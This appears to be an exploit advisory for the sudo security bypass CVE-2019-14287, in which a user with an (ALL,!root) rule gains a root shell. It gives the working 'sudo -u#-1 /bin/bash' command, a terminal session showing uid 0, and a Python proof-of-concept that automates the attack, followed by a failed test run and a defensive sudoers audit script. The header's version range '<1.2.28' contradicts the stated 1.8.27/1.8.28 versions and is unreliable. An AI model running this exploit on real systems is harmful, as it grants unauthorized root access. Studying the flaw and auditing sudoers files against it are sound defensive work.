# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Version : Sudo <1.2.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287

  • Check for the user sudo permissions
sudo -l 
  • User hacker may run the following commands on kali: (ALL, !root) /bin/bash

  • So user hacker can't run /bin/bash as root (!root)

User hacker sudo privilege in /etc/sudoers

User privilege specification

root    ALL=(ALL:ALL) ALL
hacker ALL=(ALL,!root) /bin/bash

  • With ALL specified, user hacker can run the binary /bin/bash as any user


sudo -u#-1 /bin/bash

Example :

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
  • Description : Sudo doesn't check for the existence of the specified user ID and executes the command with an arbitrary user ID. With the sudo privilege above, -u#-1 is returned as 0, which is root's ID, and /bin/bash is executed with root permission.

Proof of Concept Code :

How to use : python3


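import os

# Get current username (collected by the PoC but not used below)
username = input("Enter current username :")

# Check which binary the user can run with sudo; the listing and the
# extracted path are written to files in the current directory
os.system("sudo -l > priv")
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

# Read the extracted binary path back from the file
with open("binary") as binary_file:
    binary = binary_file.read().strip()

# Execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 " + binary)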

  • Testing, it is not working
$ python3
Enter current username :kurec

sh: 1: cannot create priv: Permission denied
sh: 1: cannot create binary: Permission denied
Lets hope it works
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] []
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
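
A defensive audit for the configuration described above, as an added example (not part of the original advisory or its PoC): it flags sudoers rules whose Runas list combines ALL with a root exclusion and compares the reported sudo version against the fixed release 1.8.28. The function names and the sample `sudo -V` line are assumptions constructed for illustration; the sudoers lines are the ones shown above.

```python
import re

FIXED = (1, 8, 28)  # the advisory states the bug is fixed in sudo 1.8.28

# Constructed sample inputs: the version line is made up for the example,
# the sudoers text repeats the rules quoted in the advisory.
SAMPLE_VERSION = "Sudo version 1.8.27"
SAMPLE_SUDOERS = """# User privilege specification
root    ALL=(ALL:ALL) ALL
hacker ALL=(ALL,!root) /bin/bash
"""

# user  host = (runas) command
RULE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*\(([^)]*)\)\s*(.+)$")

def parse_version(text):
    """Extract (major, minor, patch) from `sudo -V` style output."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None

def risky_rules(sudoers_text):
    """Return (user, runas, command) for rules whose Runas user list
    grants ALL while trying to exclude root by negation."""
    hits = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):   # comments and #include lines
            continue
        m = RULE.match(line)
        if not m:
            continue
        user, _host, runas, command = m.groups()
        # Runas is "users[:groups]"; only the user list matters here
        users = [u.strip() for u in runas.split(":")[0].split(",")]
        if "ALL" in users and any(u in ("!root", "!#0") for u in users):
            hits.append((user, runas.strip(), command.strip()))
    return hits

def assess(version_text, sudoers_text):
    """Combine both checks: exposed only if unpatched AND a risky rule exists."""
    ver = parse_version(version_text)
    unpatched = ver is not None and ver < FIXED
    rules = risky_rules(sudoers_text)
    return {"version": ver, "unpatched": unpatched,
            "exposed": unpatched and bool(rules), "rules": rules}

if __name__ == "__main__":
    print(assess(SAMPLE_VERSION, SAMPLE_SUDOERS))
```

Distribution packages may backport the fix without changing the upstream version number, so treat the version comparison as a hint and confirm against the vendor's advisory.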

